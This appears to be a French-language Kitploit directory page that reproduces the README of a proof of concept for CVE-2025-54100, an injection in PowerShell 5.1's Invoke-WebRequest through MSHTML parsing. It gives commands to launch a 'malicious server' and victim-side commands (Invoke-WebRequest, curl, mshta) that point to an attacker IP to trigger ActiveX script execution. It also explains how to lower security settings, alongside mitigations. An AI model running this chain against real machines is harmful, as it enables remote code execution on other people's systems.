Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-54100 — CVE-2025-54100 (CVSS 7.8 High) est une vulnérabilité d'injection de commande dans l'applet de commande Invoke-WebRequest de Windows PowerShell 5.1. Elle résulte d'une neutralisation incorrecte des éléments spéciaux lors de l'analyse automatique des réponses Web. | Kitploit
Outils/GitHubGitHub/themehackers/cve-2025-54100
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubthemehackers/cve-2025-54100

CVE-2025-54100

CVE-2025-54100 (CVSS 7.8 High) est une vulnérabilité d'injection de commande dans l'applet de commande Invoke-WebRequest de Windows PowerShell 5.1. Elle résulte d'une neutralisation incorrecte des éléments spéciaux lors de l'analyse automatique des réponses Web.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
317il y a 8 moisVérifié par Kitploit

CVE-2025-54100 – PoC d'analyse des réponses PowerShell

Une preuve de concept concise montrant comment CVE-2025-54100 peut conduire à une exécution de code à distance (RCE) dans Windows PowerShell 5.1 via l'analyse malveillante de HTML.

Table des matières

  • Qu'est-ce que CVE-2025-54100 ?
  • Fonctionnement du PoC
  • Démarrage rapide
  • Déclenchement depuis une machine victime
  • Dépannage et vérification
  • Preuve
  • Atténuation
  • Avertissement
  • Références

Qu'est-ce que CVE-2025-54100 ?

  • Type : Injection de commande dans Invoke-WebRequest lorsque -UseBasicParsing n'est pas utilisé
  • Sévérité : CVSS 7.8 (Élevée)
  • Cause racine : L'analyse basée sur MSHTML des réponses HTML permet l'exécution de script (par ex., ActiveXObject) dans le contexte de l'appelant.
  • Affecté : Windows 10/11 et Windows Server 2008-2025 exécutant PowerShell 5.1.

Fonctionnement du PoC

  1. Le serveur FastAPI dans CVE-2025-54100.py sert une charge utile HTML spécialement conçue.
  2. La charge utile tente d'instancier les objets ActiveX WScript.Shell / Shell.Application.
  3. Sur les hôtes vulnérables, l'analyseur MSHTML exécute le script, démontrant une RCE en lançant calc.exe.
  4. La charge utile fournie est intentionnellement minimale et non destructive, mais peut être modifiée pour des recherches ultérieures.

Démarrage rapide

Prérequis

  • Python 3.10+ (testé avec FastAPI & Uvicorn)
  • Installer les dépendances :
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    pip3 install -r requirements.txt
    

Exécuter le serveur malveillant

Lancer le serveur HTTP du PoC :

root@kitploit:~
uvicorn app:app --host 0.0.0.0  --port 8888 --reload

Déclenchement depuis une machine victime

Exécutez ces commandes sur une machine Windows vulnérable sans -UseBasicParsing :

root@kitploit:~
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://<attacker-ip>:8888"
# curl alias
curl http://<attacker-ip>:8888
# mshta
mshta http://<attacker-ip>:8888

Utilisez le même port que celui configuré pour le serveur. Si vulnérable, le script embarqué s'exécute via l'analyseur MSHTML. Certains antivirus peuvent bloquer le comportement même si le problème d'analyse est présent.

Dépannage et vérification

Si calc.exe n'apparaît pas :

  1. Ouvrez Options Internet sur la victime.
  2. Allez dans Sécurité → Niveau personnalisé...
  3. Activez « Initialiser et script de contrôles ActiveX non marqués comme sécurisés pour l'écriture de scripts. »
  4. Réexécutez Invoke-WebRequest sans -UseBasicParsing.

Cela démontre le vecteur d'exécution. Les charges utiles réelles peuvent utiliser l'obfuscation ou des contournements supplémentaires pour échapper aux restrictions par défaut.

Preuve

PoC

Atténuation

Microsoft a corrigé le problème en décembre 2025 :

  1. Appliquez les mises à jour de sécurité sur les hôtes Windows concernés.
  2. Utilisez -UseBasicParsing pour éviter l'analyse MSHTML :
    root@kitploit:~
    Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
    
  3. Passez à PowerShell 7+ (pwsh), qui ne repose pas sur MSHTML pour l'analyse.

Avertissement

[!WARNING] À des fins éducatives et de tests autorisés uniquement. Utilisez de manière responsable et respectez toutes les lois applicables. Les auteurs ne sont pas responsables d'une mauvaise utilisation ou de dommages.

Références

  • NVD : CVE-2025-54100
  • MSRC : Guide de mise à jour
  • GitHub : osman1337-security/CVE-2025-54100
Télécharger l’outil